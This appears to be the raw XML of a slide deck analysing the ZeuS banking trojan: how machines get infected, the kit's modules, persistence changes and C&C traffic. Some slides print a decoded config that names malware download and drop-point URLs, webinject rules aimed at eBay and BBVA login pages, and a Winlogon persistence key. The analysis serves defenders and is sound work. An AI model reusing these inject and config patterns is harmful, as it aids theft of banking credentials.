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3" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="280" r:id="rId4"/>
    <p:sldId id="282" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="290" r:id="rId7"/>
    <p:sldId id="284" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="292" r:id="rId10"/>
    <p:sldId id="285" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="262" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="261" r:id="rId19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2F125-656E-4584-AD7B-8C4150C98BF6}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>03-02-2012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6125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8"/>
            <a:ext cx="5335270" cy="4467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05C12-C2F9-4E69-ACCA-98F099B3DA1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0290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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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C92F-3C5F-4416-BA0D-59DA90D7E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5EF4-CB2B-4F89-88D6-C756FCF56B1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7C92F-3C5F-4416-BA0D-59DA90D7E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15EF4-CB2B-4F89-88D6-C756FCF56B1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7C92F-3C5F-4416-BA0D-59DA90D7E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RC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sz="4400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t> – God of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" b="1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657600"/>
            <a:ext cx="28003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Communication with the C&amp;C is with HTTP protocol with all data is encoded using RC4 and the key is specified by the author.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Client gets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>file.S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pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2" descr="http://www.fortiguardcenter.com/pics/analysis20091014/image-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971800"/>
            <a:ext cx="8077200" cy="309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229600" cy="533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Server response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733800"/>
            <a:ext cx="80772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838200"/>
            <a:ext cx="81153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	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Zeus in action 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2057400" cy="4572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38200"/>
            <a:ext cx="40195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914400"/>
            <a:ext cx="3810000" cy="250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581400"/>
            <a:ext cx="4038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57200" y="228600"/>
            <a:ext cx="198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/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> toolkit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2514600" y="304800"/>
            <a:ext cx="350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 create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and  the binary file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828800" cy="487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Bot C&amp;C </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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066800"/>
            <a:ext cx="56673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8600" y="60960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symatec</a:t>
            </a:r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990600"/>
            <a:ext cx="30384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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>C&amp;C administration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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1"/>
            <a:ext cx="33242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429000"/>
            <a:ext cx="715327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762000"/>
            <a:ext cx="47434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r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Sniffed data</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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1763" y="1433513"/>
            <a:ext cx="38004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66800" y="6019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fortiguard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Private data is no longer private</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800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656" y="1600200"/>
            <a:ext cx="64766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14400" y="6248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Source:fortiguard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REFERENCES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zeustracker.abuse.ch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>cert-in.org.in/virus/Zeus_Botnet_Zbot.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/RC4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http://msdn.microsoft.com/en-us/library/bb432403(VS.85).aspx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is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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239000" cy="41910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600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kit, which steals credentials for various online services like social networks, online banking accounts,  ftp accounts, email accounts and other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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Zbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSNPoem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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infected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Spam mails with attachment. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(AVALANCHE BOTNET)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam mails with a link to domain pushes bot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drive by infection (using toolkits like el-Fiesta, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>neospolit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Zeus-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bredolab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533400"/>
            <a:ext cx="21145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581400"/>
            <a:ext cx="3276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066800"/>
            <a:ext cx="58102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886200"/>
            <a:ext cx="35242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62000" y="2286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Infection vectors …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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> kit contains the following modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A web interface to administrate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Admin Panel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> A tool to create the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> binaries and encrypt the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> file, called exe builder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> file which is applied to the infected computer (bot)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Zeus drop zone where the stolen credentials are posted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Contd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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System changes observed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%system32%\sdra64.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>%System%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>lowsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> \user.ds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>%System%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>lowsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>\local.ds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>userinit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> =&lt;exe path&gt;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Gathering system information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Stealing protected storage information, FTP, POP3  passwords etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stealing online credential information as specified in the configuration file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web page injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Calling home to perform additional  task.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Configuration file contents….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1"/>
            <a:ext cx="83820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/>
              <a:t>Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>excerpts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t> local.ds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(decoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>):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380997" y="1219200"/>
            <a:ext cx="7924799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&lt;?xml version="1.0" encoding="ISO-8859-1" ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;root&gt;  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>updatepoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;http://tsaash.com/data/bot.exe&lt;/url&gt;   &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>updatepoint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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>configurationpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;http://pociau.com/cfg2.bin&lt;/url&gt;   &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>configurationpoint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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>droppoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;http://tsaash.com/data/gate.php&lt;/url&gt;   &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>droppoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:noFill/>
            </a:endParaRPr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webinjects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    &lt;trigger&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;![CDATA[*/my.ebay.com/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>MyeBayPersonalInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>*]]&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>url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      &lt;html&gt;&lt;![CDATA[ Registered email address&lt;/td&gt;*&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>*&gt;]]&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>      &lt;html&gt;&lt;![CDATA[&lt;/td&gt;]]&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>      &lt;html&gt;&lt;![CDATA[e-mail: ]]&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    &lt;/trigger&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    &lt;trigger&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;![CDATA[*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ebay.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>eBayISAPI.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>?*]]&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>url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      &lt;html&gt;&lt;![CDATA[(&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&amp;*"&gt;]]&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>      &lt;html&gt;&lt;![CDATA[&lt;/a&gt;]]&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>      &lt;html&gt;&lt;![CDATA[Feedback: ]]&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    &lt;/trigger&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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934200" y="1219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239000" y="1524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91400" y="1676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" y="58674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May contain these data as well; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AdvancedConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Webfilters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webfakes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DNSMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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IN" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Web Page Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" smtClean="0"/>
            </a:b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914401"/>
            <a:ext cx="716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 smtClean="0"/>
              <a:t>set_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>  https://www.bbvanetoffice.com/local_...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>netoffice.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>data_before</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>name="password"*&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>&gt;]]&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>data_inject</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;td height="20" class="c"&gt;&lt;span class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>txtbc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>"&gt;Firma&lt;/span&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>data_end</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>data_after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>data_end</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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352800"/>
            <a:ext cx="4055136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352800"/>
            <a:ext cx="3276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57400" y="6324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29400" y="6248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516</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>87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 What is ZeuS? </vt:lpstr>
      <vt:lpstr>How to get infected</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> What is ZeuS? Contd….</vt:lpstr>
      <vt:lpstr>Major System changes observed</vt:lpstr>
      <vt:lpstr>functionality</vt:lpstr>
      <vt:lpstr>Configuration file contents….</vt:lpstr>
      <vt:lpstr>Web Page Injection </vt:lpstr>
      <vt:lpstr>Network connections</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>    </vt:lpstr>
      <vt:lpstr>Bot C&amp;C </vt:lpstr>
      <vt:lpstr>C&amp;C administration</vt:lpstr>
      <vt:lpstr>Sniffed data</vt:lpstr>
      <vt:lpstr>Private data is no longer private</vt:lpstr>
